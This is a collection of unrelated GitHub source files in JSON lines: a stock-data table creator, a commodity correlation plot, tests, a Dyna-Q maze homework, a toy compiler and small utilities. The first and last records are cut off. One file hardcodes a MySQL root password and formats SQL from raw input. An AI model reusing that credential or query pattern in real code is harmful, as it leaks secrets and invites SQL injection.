TestClient(main.app) as client:\n        yield client\n\n    main.app.dependency_overrides = {}\n    Base.metadata.drop_all(bind=test_engine)\n","repo_name":"PythonFreeCourse/calendar","sub_path":"tests/client_fixture.py","file_name":"client_fixture.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"35"} +{"seq_id":"12619541274","text":"# @author Duke Chain\n# @File:CreateStockInfo.py\n# @createTime 2020/11/05 22:54:05\n\nimport pymysql\n\n\nclass CreateStockInfo:\n    \"\"\"\n    Create a table in the stock_info database for newly collected data.\n    Table naming rule: stockID\n\n    Args:\n        stockID: the stock ID to create the table for\n        database: the target database (daily, weekly, monthly)\n        content: the data granularity (d = daily, t = tick/second, m = minute)\n    \"\"\"\n\n    def __init__(self, stockID, database, content='m'):\n        self.stockID = stockID\n        self.database = database\n        self.content = content\n\n    def _connection(self):\n        \"\"\"\n        Establish the connection to the database\n        \"\"\"\n        conn = pymysql.connect(\"localhost\", \"root\", \"qian258046\", self.database, charset='utf8')\n        cursor = conn.cursor()\n        return cursor, conn\n\n    def createTable(self):\n        \"\"\"\n        Create the table for stockID\n        ts_code trade_date open high low close pre_close chg pct_chg vol amount\n\n        Returns:\n            True if the table was created, False if it already exists\n        \"\"\"\n        cursor, conn = self._connection()\n        existence = cursor.execute(\"show tables like '%s';\" % self.stockID)\n        # check whether the table already exists\n        if existence == 1:\n            print('The table already exists and will not be created again')\n            return False\n        else:\n            # daily data table\n            if self.content == 'd':\n                sql = \"\"\"CREATE TABLE `{}`(\n                trade_date char(30),\n                close_price float,\n                high_price float,\n                low_price float,\n                open_price float,\n                pre_close float,\n                volume float,\n                outstanding_share float,\n                turnover float\n                )\"\"\".format(self.stockID)\n            # second-level (tick) data table\n            elif self.content == 't':\n                sql = \"\"\"CREATE TABLE `{}`(\n                trade_date char(30),\n                stock_price float,\n                chg float,\n                volume float\n                )\"\"\".format(self.stockID)\n            # minute-level data table\n            else:\n                sql = \"\"\"CREATE TABLE `{}`(\n                trade_date char(30),\n                open_price float,\n                high_price float,\n                low_price float,\n                close_price float,\n                volume float\n                )\"\"\".format(self.stockID)\n            cursor.execute(sql)\n            print(self.stockID + \" info table has been created!\")\n            conn.commit()\n            conn.close()\n\n            return True\n\n# test code\n# test = CreateStockInfo('test_table')\n# test.createTable()\n","repo_name":"dukechain2333/BossaNova","sub_path":"DBOperate/CreateStockInfo.py","file_name":"CreateStockInfo.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"29104988390","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport matplotlib.dates as mdates\n\n\n#1/1/07 till now monthly (per gram?)\n\ngold = pd.read_csv(\"Gold.csv\")\nbrent = pd.read_csv(\"brent-month_csv.csv\")\ndollar = pd.read_csv(\"USDX.csv\")\ndates = mdates.num2date(mdates.datestr2num(gold['date']))\nGold = gold['price']\nBrent = brent['Brent Spot Price']\nDollar = dollar['Price']\n\nfig, ax1 = plt.subplots()\nax1.plot(dates, Gold, 'y')\nax1.set_ylabel('Gold (yellow)')\nax2 = ax1.twinx()\nax2.plot(dates, Brent, 'k')\nax2.set_ylabel('Brent (Black)')\nfig.autofmt_xdate()\nplt.grid(True)\n\nfig, ax1 = plt.subplots()\nax1.plot(dates, Dollar, 'r')\nax1.set_ylabel('Dollar (red)')\nax2 = ax1.twinx()\nax2.plot(dates, Brent, 'k')\nax2.set_ylabel('Brent (Black)')\nfig.autofmt_xdate()\nplt.grid(True)\n\nfig, ax1 = plt.subplots()\nax1.plot(dates, Dollar, 'r')\nax1.set_ylabel('Dollar (red)')\nax2 = ax1.twinx()\nax2.plot(dates, Gold, 'y')\nax2.set_ylabel('Gold (yellow)')\nfig.autofmt_xdate()\nplt.grid(True)\n\nGoldBrent07_12 = np.corrcoef(Gold[0:84],Brent[0:84]) #From 07 to 12\nGoldBrent15_18 = np.corrcoef(Gold[96:],Brent[96:]) #From 15 to 18\n\nprint('GoldBrent07_12', GoldBrent07_12[0][1])\nprint('GoldBrent15_18', GoldBrent15_18[0][1])\nprint('overall GoldBrent', np.corrcoef(Gold,Brent)[0][1])\n\nDollarBrent09_15 = np.corrcoef(Dollar[43:115],Brent[24:96])\nDollarBrent15_18 = np.corrcoef(Dollar[0:43],Brent[96:-1]) \n# Dollar has one month less than Brent (dimension error) so use -1\nprint('DollarBrent09_15', DollarBrent09_15[0][1])\nprint('DollarBrent15_18', DollarBrent15_18[0][1])\nprint('overall DollarBrent', np.corrcoef(Dollar,Brent)[0][1])","repo_name":"shervinrad100/Python-Projects","sub_path":"Hobby/Gold, Dollar, Oil/oilvGold.py","file_name":"oilvGold.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"25359348993","text":"import os\n\nimport pytest\n\nfrom stringify.stringify import stringify\n\n# Return the full path to a file in the fixtures directory\ndef get_fixture_path(file_name):\n    current_dir = os.path.dirname(os.path.abspath(__file__))\n    return os.path.join(current_dir, 'fixtures', file_name)\n\n# Read the file at the given path\ndef read(file_path):\n    with open(file_path, 'r') as f:\n        result = f.read()\n    return result\n\n# Create several test values of primitive data \n# types for checking the stringify() function\nprimitives = {\n    \"string\": \"value\",\n    \"boolean\": True,\n    \"number\": 5,\n}\n\n# Create a complex nested data structure \n# for checking the stringify() function\nnested = {\n    \"string\": \"value\",\n    \"boolean\": True,\n    \"number\": 5,\n    \"dict\": {\n        5: \"number\",\n        None: \"None\",\n        True: \"boolean\",\n        \"value\": \"string\",\n        \"nested\": {\n            \"boolean\": True,\n            \"string\": 'value',\n            \"number\": 5,\n            None: \"None\",\n        },\n    },\n}\n\n# Create a list of test cases for checking the stringify() function\n# Each case holds three parameters: the replacer, \n# the number of spaces (spaces_count) and the index \n# of the corresponding block in plain.txt and nested.txt\ncases = [\n    ('|-', 1, 0),  # first nesting level, 1 space\n    ('|-', 2, 1),  # second nesting level, 2 spaces\n    (' ', 3, 2),  # third nesting level, 3 spaces\n]\n\n# Test stringify() on primitive data types\n# Check that the function correctly converts a string, \n# a boolean and a number to a string\n@pytest.mark.parametrize(\"value\", primitives.values())\ndef test_primitives(value):\n    \n    assert stringify(value) == str(value)\n\nplain_data = read(get_fixture_path('plain.txt')).rstrip().split('\\n\\n\\n')\nnested_data = read(get_fixture_path('nested.txt')).rstrip().split('\\n\\n\\n')\n\n# Test stringify() on a complex nested data structure\n# Check that the function correctly converts a dict with nested dicts and lists into a string with the given \n# number of spaces and replacers\n@pytest.mark.parametrize(\"replacer,spaces_count,case_index\", cases)\ndef test_nested(replacer, spaces_count, case_index):\n    expected = nested_data[case_index]\n    assert stringify(nested, replacer, spaces_count) == expected\n\n# Test stringify() on primitive data types\n# Check that the function correctly converts a dict with primitive data types into a string with the given \n# number of spaces and replacers\n@pytest.mark.parametrize(\"replacer,spaces_count,case_index\", cases)\ndef test_plain(replacer, spaces_count, case_index):\n    expected = plain_data[case_index]\n    assert stringify(primitives, replacer, spaces_count) == expected\n\n\ndef test_default_values():\n    assert stringify(primitives) == plain_data[3]\n    assert stringify(primitives, ' ') == plain_data[3]\n    assert stringify(primitives, '...') == plain_data[4]\n    assert stringify(nested) == nested_data[3]\n    assert stringify(nested, ' ') == nested_data[3]\n    assert stringify(nested, '...') == nested_data[4]\n","repo_name":"AlexanderLarriva/Stringify","sub_path":"tests/test_stringify.py","file_name":"test_stringify.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28919418648","text":"#Mateo Guaman Castro\n#Homework 3\n#Tufts University\n#Comp 150: Reinforcement Learning\n#Exercise 8.4: Dyna-Q+\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nclass Environment:\n    def __init__(self):\n        self.maze = self.generate_maze()\n    def generate_maze(self):\n        maze = np.array([[1, 1, 1, 1, 1, 1, 1, 1, 100],\n                        [1, 1, 1, 1, 1, 1, 1, 1, 1],\n                        [1, 1, 1, 1, 1, 1, 1, 1, 1],\n                        [1, 0, 0, 0, 0, 0, 0 ,0, 0],\n                        [1, 1, 1, 1, 1, 1, 1, 1, 1],\n                        [1, 1, 1, 500, 1, 1, 1, 1, 1]])\n        return maze\n\n\nclass Agent:\n    def __init__(self, maze, epsilon, gamma, alpha, kappa, n):\n        #Initialize maze\n        self.maze = maze\n        print(\"Initial maze\")\n        #Initialize action space A\n        self.act = [-1, 0, 1]\n        self.A = [(1,0), (-1, 0), (0, 1), (0, -1)]\n        #Initialize state space S\n        self.row_pos = [i for i in range(self.maze.shape[0])]\n        
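# S (built below) enumerates every (row, col) cell and A the four moves, so\n        # the 6x9 maze above yields 54 states x 4 actions = 216 Q-table and model entries.\n        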
self.col_pos = [i for i in range(self.maze.shape[1])]\n\n self.S = list(((x,y) for x in self.row_pos for y in self.col_pos))\n\n #Array to keep track of previously selected states and actions\n self.previously_selected = np.zeros((len(self.S), len(self.A)))\n self.Q, self.Model = self.initialize_Q_Model(self.S, self.A)\n self.lastVisited = np.zeros((len(self.S), len(self.A)))\n self.epsilon = epsilon\n self.gamma = gamma\n self.alpha = alpha\n self.kappa = kappa\n self.n = n\n\n def initialize_Q_Model(self, state_space, action_space):\n '''\n Initializes Q(s, a) anc C(s, a) where s in Z^4 and a in Z^2\n Input:\n State space as list of (row_pos, col_pos, row_vel, col_vel)\n Action space as list of (row_delta, col_delta)\n Returns:\n Dictionary Q with key ((row_pos, col_pos, row_vel, col_vel), (row_delta, col_delta)) and value radnom number from normal distribution\n Dictionary Model with key ((row_pos, col_pos, row_vel, col_vel), (row_delta, col_delta)) and value [0,0] where the elements are [Reward, New_state]\n '''\n state_action_tuples = tuple((x, y) for x in state_space for y in action_space)\n Q = {l:np.random.normal(0,1) for l in state_action_tuples}\n Model = {l:[0, 0] for l in state_action_tuples}\n return Q, Model\n\n\n def argmax(self, state):\n '''\n Finds the argmax_a and max_a for a given state. Used for Dyna-Q and Dyna-Q+ with bonus on the reward\n Input:\n State as a tuple (row_pos, col_pos, row_vel, col_vel)\n Returns:\n arg: Index of what action in self.A has the highest value\n highest_Q: Q_value for action with highest value\n '''\n highest_Q = self.Q[state, self.A[0]]\n arg = 0\n for i in range(1, len(self.A)):\n if self.Q[state, self.A[i]] > highest_Q:\n highest_Q = self.Q[state, self.A[i]]\n arg = i\n return arg, highest_Q\n\n def argmax_bonus(self, state):\n '''\n Finds the argmax_a and max_a for a given state. 
Used for Dyna-Q+ with bonus on the action value\n        Input:\n            State as a tuple (row_pos, col_pos, row_vel, col_vel)\n        Returns:\n            arg: Index of what action in self.A has the highest value + bonus\n            highest_Q: Q_value for action with highest value\n        '''\n        highest_Q = self.Q[state, self.A[0]] + self.kappa * math.sqrt(self.lastVisited[self.S.index(state), 0])\n        arg = 0\n        for i in range(1, len(self.A)):\n            if self.Q[state, self.A[i]] + self.kappa * math.sqrt(self.lastVisited[self.S.index(state), i]) > highest_Q:\n                # keep the running maximum consistent with the comparison: include the exploration bonus\n                highest_Q = self.Q[state, self.A[i]] + self.kappa * math.sqrt(self.lastVisited[self.S.index(state), i])\n                arg = i\n        return arg, highest_Q\n\n    def epsilon_greedy(self, state):\n        '''\n        Selects an action based on the epsilon-greedy method\n        Input:\n            State as a tuple (row_pos, col_pos, row_vel, col_vel)\n        Returns:\n\n        '''\n        rand_val = np.random.random()\n        if rand_val >= self.epsilon:\n            action, _ = self.argmax(state)\n        else:\n            action = np.random.randint(0,len(self.A))\n        return action\n\n    def epsilon_greedy_bonus(self, state):\n        '''\n        Selects an action based on the epsilon-greedy method\n        Input:\n            State as a tuple (row_pos, col_pos, row_vel, col_vel)\n        Returns:\n\n        '''\n        rand_val = np.random.random()\n        if rand_val >= self.epsilon:\n            action, _ = self.argmax_bonus(state)\n        else:\n            action = np.random.randint(0,len(self.A))\n        return action\n\n    def Q_step(self, state, action, reward, new_state):\n        act = self.A[action]\n        _, max_a_new_state = self.argmax(new_state)\n        self.Q[state, act] += self.alpha * (reward + self.gamma * max_a_new_state - self.Q[state, act])\n        return\n\n    def update_model(self, state, action, reward, new_state):\n        act = self.A[action]\n        self.previously_selected[self.S.index(state), self.A.index(act)] = 1\n        self.Model[state, act][0] = reward\n        self.Model[state, act][1] = new_state\n        return\n\n    def planning_DynaQ(self):\n        for _ in range(0,self.n):\n            prev_state = self.random_observed_state()\n            prev_action = self.random_prev_action(prev_state)\n            state = self.S[prev_state]\n            action = self.A[prev_action]\n            model_sa = self.Model[state, action]\n            reward = model_sa[0]\n            new_state = model_sa[1]\n            self.Q_step(state, prev_action, reward, new_state)\n        return\n\n    def planning_DynaQPlus_reward(self):\n        for _ in range(0, self.n):\n            prev_state = self.random_observed_state()\n            prev_action = self.random_prev_action(prev_state)\n            state = self.S[prev_state]\n            action = self.A[prev_action]\n            model_sa = self.Model[state, action]\n            reward = model_sa[0] + self.kappa * math.sqrt(self.lastVisited[prev_state, prev_action])\n            new_state = model_sa[1]\n            self.Q_step(state, prev_action, reward, new_state)\n        return\n\n    def planning_DynaQPlus_action(self):\n        for i in range(0, self.n):\n            prev_state = self.random_observed_state()\n            prev_action = self.random_prev_action(prev_state)\n            state = self.S[prev_state]\n            action = self.A[prev_action]\n            if (self.previously_selected[prev_state, prev_action] == 1):\n                model_sa = self.Model[state, action]\n                reward = model_sa[0]\n                new_state = model_sa[1]\n            else:\n                reward = 0\n                new_state = state\n            self.Q_step(state, prev_action, reward, new_state)\n        return\n\n\n    def random_observed_state(self):\n        indeces = np.where(self.previously_selected == 1)[0]\n        return np.random.choice(indeces)\n\n    def random_prev_action(self, state_index):\n        indeces = np.where(self.previously_selected[state_index, :] == 1)[0]\n        return np.random.choice(indeces)\n\n    def update_last_visited(self, state, action):\n        act = self.A[action]\n        self.lastVisited += 1\n        self.lastVisited[self.S.index(state), self.A.index(act)] = 0\n        return\n\n\n\n\ndef main():\n    steps_per_n_avg = 
np.ndarray((10,10))\n    epsilon = 0.3\n    gamma = 0.95\n    alpha = 0.7\n    kappa = 0.01\n    n = 10\n    num_steps = 100000\n    num_iterations_to_avg = 10\n\n    avg_DynaQ = np.zeros((num_iterations_to_avg, num_steps))\n    avg_DynaQPlus_reward = np.zeros((num_iterations_to_avg, num_steps))\n    avg_DynaQPlus_action = np.zeros((num_iterations_to_avg, num_steps))\n\n    for k in range(0, num_iterations_to_avg):\n        cum_reward = []\n        env = Environment()\n        agent = Agent(env.maze, epsilon, gamma, alpha, kappa, n)\n        episode_info, cum_reward = generate_episode_DynaQ(env, agent, num_steps)\n        avg_DynaQ[k, :] = cum_reward\n\n\n        cum_reward = []\n        env = Environment()\n        agent = Agent(env.maze, epsilon, gamma, alpha, kappa, n)\n        episode_info, cum_reward = generate_episode_DynaQPlus_action(env, agent, num_steps)\n        avg_DynaQPlus_action[k, :] = cum_reward\n\n\n\n        cum_reward = []\n        env = Environment()\n        agent = Agent(env.maze, epsilon, gamma, alpha, kappa, n)\n        episode_info, cum_reward = generate_episode_DynaQPlus_reward(env, agent, num_steps)\n        avg_DynaQPlus_reward[k, :] = cum_reward\n\n    avg_DynaQ = np.mean(avg_DynaQ, axis = 0)\n    DynaQ_plot, = plt.plot(np.arange(num_steps), avg_DynaQ, 'r', label='Dyna-Q Learning (n = 10)')\n    avg_DynaQPlus_action = np.mean(avg_DynaQPlus_action, axis = 0)\n    DynaQAction_plot, = plt.plot(np.arange(num_steps), avg_DynaQPlus_action, 'g', label='Dyna-Q+ Learning, bonus on action (n = 10)')\n    avg_DynaQPlus_reward = np.mean(avg_DynaQPlus_reward, axis = 0)\n    DynaQReward_plot, = plt.plot(np.arange(num_steps), avg_DynaQPlus_reward, 'b', label='Dyna-Q+ Learning, bonus on reward (n = 10)')\n\n    plt.title(\"Cumulative reward vs Number of steps\")\n    plt.ylabel(\"Cumulative reward\")\n    plt.xlabel(\"Number of steps\")\n    plt.legend(handles=[DynaQ_plot, DynaQAction_plot, DynaQReward_plot])\n    plt.savefig('cumReward.png', dpi=300, bbox_inches='tight')\n\n    plt.close()\n    plot_on_track(env, episode_info)\n    plt.imshow(env.maze * 5, cmap='hot', interpolation='nearest')\n    plt.title(str(\"Number of steps: \" + str(episode_info.shape[0])))\n    plt.savefig('figure.png', dpi=300, bbox_inches='tight')\n\n\ndef generate_episode_DynaQ(env, agent, num_steps):\n    cumReward = []\n    trajectory = np.empty((0, 4))\n    done = False\n    state = starting_state(env)\n    for i in range(0, num_steps):\n        if i == 2000:\n            change_maze(env, agent)\n        action = agent.epsilon_greedy(state)\n        new_state, crossed_boundary, crossed_finish, reward = state_transition(env, agent, state, action)\n        agent.Q_step(state, action, reward, new_state)\n        agent.update_model(state, action, reward, new_state)\n        agent.update_last_visited(state, action)\n        agent.planning_DynaQ()\n        current = np.array([state, action, reward, new_state], ndmin = 2)\n        trajectory = np.append(trajectory, current, axis = 0)\n        cumReward = update_cum_reward(cumReward, reward)\n        state = new_state\n        done = crossed_finish\n        if (done):\n            state = starting_state(env)\n    return trajectory, cumReward\n\ndef generate_episode_DynaQPlus_reward(env, agent, num_steps):\n    cumReward = []\n    trajectory = np.empty((0, 4))\n    done = False\n    state = starting_state(env)\n    for i in range(0, num_steps):\n        if i == 2000:\n            change_maze(env, agent)\n        action = agent.epsilon_greedy(state)\n        new_state, crossed_boundary, crossed_finish, reward = state_transition(env, agent, state, action)\n        agent.Q_step(state, action, reward, new_state)\n        agent.update_model(state, action, reward, new_state)\n        agent.update_last_visited(state, action)\n        agent.planning_DynaQPlus_reward()\n        current = np.array([state, action, reward, new_state], ndmin = 2)\n        trajectory = np.append(trajectory, 
current, axis = 0)\n cumReward = update_cum_reward(cumReward, reward)\n state = new_state\n done = crossed_finish\n if (done):\n state = starting_state(env)\n return trajectory, cumReward\n\ndef generate_episode_DynaQPlus_action(env, agent, num_steps):\n cumReward = []\n trajectory = np.empty((0, 4))\n done = False\n state = starting_state(env)\n for i in range(0, num_steps):\n if i == 2000:\n change_maze(env, agent)\n action = agent.epsilon_greedy_bonus(state)\n new_state, crossed_boundary, crossed_finish, reward = state_transition(env, agent, state, action)\n agent.Q_step(state, action, reward, new_state)\n agent.update_model(state, action, reward, new_state)\n agent.update_last_visited(state, action)\n agent.planning_DynaQPlus_action()\n current = np.array([state, action, reward, new_state], ndmin = 2)\n trajectory = np.append(trajectory, current, axis = 0)\n cumReward = update_cum_reward(cumReward, reward)\n state = new_state\n done = crossed_finish\n if (done):\n state = starting_state(env)\n return trajectory, cumReward\n\ndef starting_state(env):\n possible_starts = np.where(env.maze[-1,:] == 500)[0]\n i = np.random.randint(0,len(possible_starts))\n state = (env.maze.shape[0]-1, possible_starts[i])\n return state\n\n\ndef state_transition(env, agent, state, action):\n act = agent.A[action]\n crossed_boundary = False\n crossed_finish = False\n reward = 0\n temp_state = list(state)\n\n temp_state[0] += act[0]\n temp_state[1] += act[1]\n\n if (not in_track(env, temp_state)):\n crossed_boundary = True\n return state, crossed_boundary, crossed_finish, reward\n if in_finish_line(env, temp_state):\n reward = 1\n crossed_finish = True\n return tuple(temp_state), crossed_boundary, crossed_finish, reward\n return tuple(temp_state), crossed_boundary, crossed_finish, reward\n\ndef in_track(env, state):\n return in_bounds(env, state) and (env.maze[state[0], state[1]] != 0)\n\ndef in_bounds(env, state):\n return (state[0] >= 0 and state[0] < env.maze.shape[0]) and (state[1] >= 0 and state[1] < env.maze.shape[1])\n\ndef in_finish_line(env, state):\n return env.maze[state[0], state[1]] == 100\n\ndef plot_on_track(env, trajectories):\n for i in range(0, trajectories.shape[0]):\n state = trajectories[i, 0]\n env.maze[state[0], state[1]] += 5\n\ndef update_cum_reward(reward_list, current_reward):\n number_rewards = len(reward_list)\n if number_rewards == 0:\n reward_list.append(current_reward)\n else:\n last_reward = reward_list[number_rewards - 1]\n reward_list.append(last_reward + current_reward)\n return reward_list\n\ndef change_maze(env, agent):\n env.maze = np.array([[1, 1, 1, 1, 1, 1, 1, 1, 100],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0 ,0, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 500, 1, 1, 1, 1, 1]])\n agent.maze = env.maze\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mateoguaman/Reinforcement-Learning","sub_path":"HW3/maze2.py","file_name":"maze2.py","file_ext":"py","file_size_in_byte":14490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29380979611","text":"import sys\nfrom collections import deque\nfrom heapq import heappush, heappop\nsys.setrecursionlimit(10**9)\nsys.stdin = open('../input.txt')\n\ndef post(start, end):\n if start > end:\n return\n mid = end + 1\n for i in range(start+1, end+1):\n if Num[i] > Num[start]:\n mid = i\n break\n\n post(start+1, mid-1)\n post(mid, end)\n print(Num[start])\n\nif __name__==\"__main__\":\n Num = list()\n while True:\n 
try:\n            N = int(input())\n            Num.append(N)\n        except:\n            break\n\n    post(0, len(Num)-1)","repo_name":"Taesun0727/Algorithms","sub_path":"Python/BaekJoon/5639/sun.py","file_name":"sun.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23312466124","text":"from pila import Pila\r\n\r\nfrom functools import reduce\r\n\r\ndiccionario=['*','/','+','-','=']\r\nvariables = {}\r\nerror=[]\r\n\r\ndef esOperador(diccionario,ch):\r\n    if(len([x for x in diccionario if x==ch])>0):\r\n        return True\r\n    else:\r\n        return False\r\n\r\ndef verDiccionario(diccionario,ch):\r\n    if(esOperador(diccionario,ch)):\r\n        return True\r\n    elif (ch.isdigit()):\r\n        return True\r\n    elif (ch.isalpha()):\r\n        return True\r\n    else:\r\n        return False\r\n\r\ndef estaAsignada(variable):\r\n    if (variable in variables):\r\n        return True\r\n    else:\r\n        return False\r\n\r\ndef analisis(lista):\r\n    for x in lista:\r\n        for ch in x:\r\n            if(not verDiccionario(diccionario,ch)):\r\n                error.append(\"Error caracter no válido \"+ch)\r\n    if (not(len(error)>0)):\r\n        pila= Pila()\r\n        for x in lista:\r\n            if(not(len(error)>0)):\r\n                analisisSintactico(x)\r\n                for ch in x:\r\n                    if(not(len(error)>0)):\r\n                        pila.apilar(ch)\r\n                        if(ch==\"=\"):\r\n                            pila.desapilar()\r\n                        elif((ch.isalpha)and (not(ch.isdigit())) and (not(esOperador(diccionario,ch)))):\r\n                            if(ch==x[len(x)-2]):\r\n                                pila.desapilar()\r\n                                if(len(pila.items)>1):\r\n                                    error.append(\"Error no hay operador\")\r\n                                else:\r\n                                    variables[ch]=pila.desapilar()\r\n                            else:\r\n                                if(estaAsignada(ch)):\r\n                                    pila.desapilar()\r\n                                    pila.apilar(variables[ch])\r\n                                else:\r\n                                    error.append(\"Error variable inexistente \"+ch)\r\n                        elif((len(pila.items)>2)and(esOperador(diccionario,ch))):\r\n                            signo = pila.desapilar()\r\n                            num2 = pila.desapilar()\r\n                            num1 = pila.desapilar()\r\n                            pila.apilar(resolver(num1,num2,signo))\r\n                    else:\r\n                        print(error)\r\n            else:\r\n                print(error)\r\n        print(variables)\r\n    else: \r\n        print(error)\r\n\r\ndef evaluar(num1,num2,signo):\r\n    if signo=='+':\r\n        return str(int(num1) + int(num2))\r\n    elif signo=='-':\r\n        return str(int(num1) - int(num2))\r\n    elif signo=='*':\r\n        return str(int(num1) * int(num2))\r\n    elif signo=='/':\r\n        return str(int((int(num1) / int(num2))))\r\n    else:\r\n        return 0\r\n    \r\n    \r\n\r\ndef resolver(num1,num2,signo):\r\n    if(num1.isdigit())and(num2.isdigit())and(esOperador(diccionario,signo)):\r\n        return evaluar(num1,num2,signo)\r\n    else:\r\n        error.append(\"Error sintaxis invalida \"+num2+\" \"+signo+\" \"+num1)\r\n        return 0\r\n    \r\ndef analisisSintactico(lista):\r\n    if(esOperador(diccionario,lista[0])):\r\n        error.append(\"Analisis Sintactico: incorrecto, No puede iniciar con un operador\")\r\n    elif(lista[len(lista)-1] != '='):\r\n        error.append(\"Analisis Sintactico: incorrecto, No hay operaador de igualdad\")\r\n    elif(not(lista[len(lista)-2].isalpha())):\r\n        error.append(\"Analisis Sintactico: incorrecto, No hay variable para asignar valor\")\r\n    \r\n\r\na=open(\"datos.txt\",'r')\r\nlistaG= [y.split() for y in [x.strip('\\n') for x in a.readlines()]]\r\n\r\nanalisis(listaG)\r\n\r\n\r\n\r\n\r\n","repo_name":"SCVA/CompiladoresIntro","sub_path":"Ejercicio compilador/compilador.py","file_name":"compilador.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21852675959","text":"# Linear_search \r\n\r\ndef linear_search(alist,item):\r\n    pos=0\r\n    found=False\r\n\r\n    while pos<len(alist) and not found:\r\n        if alist[pos]==item:\r\n            found=True\r\n        else:\r\n            pos=pos+1\r\n    return found\r\n\r\n# linear search on a sorted list: stop early once an element exceeds the item\r\ndef linear_search1(alist,item):\r\n    pos=0\r\n    found=False\r\n    stop=False\r\n\r\n    while pos<len(alist) and not found and not stop:\r\n        if alist[pos]==item:\r\n            found=True\r\n        else:\r\n            if alist[pos]>item:\r\n                stop=True\r\n            
else:\r\n pos+=1\r\n return found\r\n\r\nalist=[1,2,3,4,5,6,7,8,9,10]\r\nprint(linear_search1(alist,3))\r\nprint(linear_search1(alist,13))\r\n","repo_name":"rahul9852-dot/Data-Structure-and-Algorithms","sub_path":"DSA/searching&sorting/linear_searching.py","file_name":"linear_searching.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"24592828156","text":"import file_processor\nimport user_interface\n\nINPUT_FILE_NAME = 'text.txt'\n\n\ndef main():\n \"\"\"\n Main function of the application that initiates the text file processing.\n Process Flow:\n 1. Gets the path to the input text file (input_file_path) and the maximum\n line size (max_chunk_size)\n using the user interface from the user_interface module.\n 2. Processes the text file by splitting lines into chunks and saves the\n result in a separate file.\n This process is done using the process_file function from the\n file_processor module.\n \"\"\"\n\n # Path to the input text file (can be changed to another file).\n input_file_path = INPUT_FILE_NAME\n # Get the maximum line size.\n max_chunk_size = user_interface.get_max_chunk_size_from_user()\n\n # Start processing the text file with the specified maximum line size.\n file_processor.process_file(input_file_path, max_chunk_size)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MikitaTsiarentsyeu/Md-PT1-69-23","sub_path":"Tasks/Romanychev/Task4/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"30398302927","text":"from direct.gui.OnscreenText import OnscreenText \r\nfrom direct.gui.DirectGui import *\r\n\r\nfrom panda3d.core import NodePath\r\nfrom panda3d.core import TextNode\r\n\r\nclass TextInput():\r\n \r\n def __init__(self, pos, onEnterTextFn):\r\n self.onEnterTextFn = onEnterTextFn\r\n self.bk_text = \"This is my Demo\"\r\n# self.textObject = OnscreenText(text = self.bk_text, pos = (0.95,-0.95), \r\n# scale = 0.07, fg = (1,0.5,0.5,1), \r\n# align = TextNode.ACenter,mayChange=1)\r\n \r\n self.addText(pos)\r\n \r\n def addText(self, pos):\r\n self.entry = DirectEntry(text = \"\", scale=.05, command = self.setText,\r\n initialText=\"Type Something\", numLines = 2, \r\n focus=1, focusInCommand = self.clearText)\r\n entry = self.entry\r\n# entry.setColor(1, 1, 1, 0.5)\r\n entry.setPos(pos.x, 0, pos.y)\r\n print(\"bounds \" + str(entry.getHeight()))\r\n# entry.\r\n \r\n# self.entry.setObscureMode()\r\n \r\n def setText(self, textEntered):\r\n self.entry.destroy()\r\n self.onEnterTextFn(textEntered)\r\n \r\n def clearText(self):\r\n self.entry.enterText('')\r\n \r\n\r\n \r\n ","repo_name":"Nickan/Mind-Map-Panda3D","sub_path":"src/gui/textinput.py","file_name":"textinput.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"12255578938","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom datasets import load_dataset\nfrom transformers import AutoModel, AutoTokenizer\n\n\ndef collate_fn(batch):\n batch_input_ids = torch.stack([torch.tensor(x[\"input_ids\"]) for x in batch])\n batch_attention_masks = torch.stack([torch.tensor(x[\"attention_mask\"]) for x in batch])\n\n model = AutoModel.from_pretrained(\"distilbert-base-uncased\")\n outputs = model(batch_input_ids, attention_mask=batch_attention_masks)\n\n batch_inputs = 
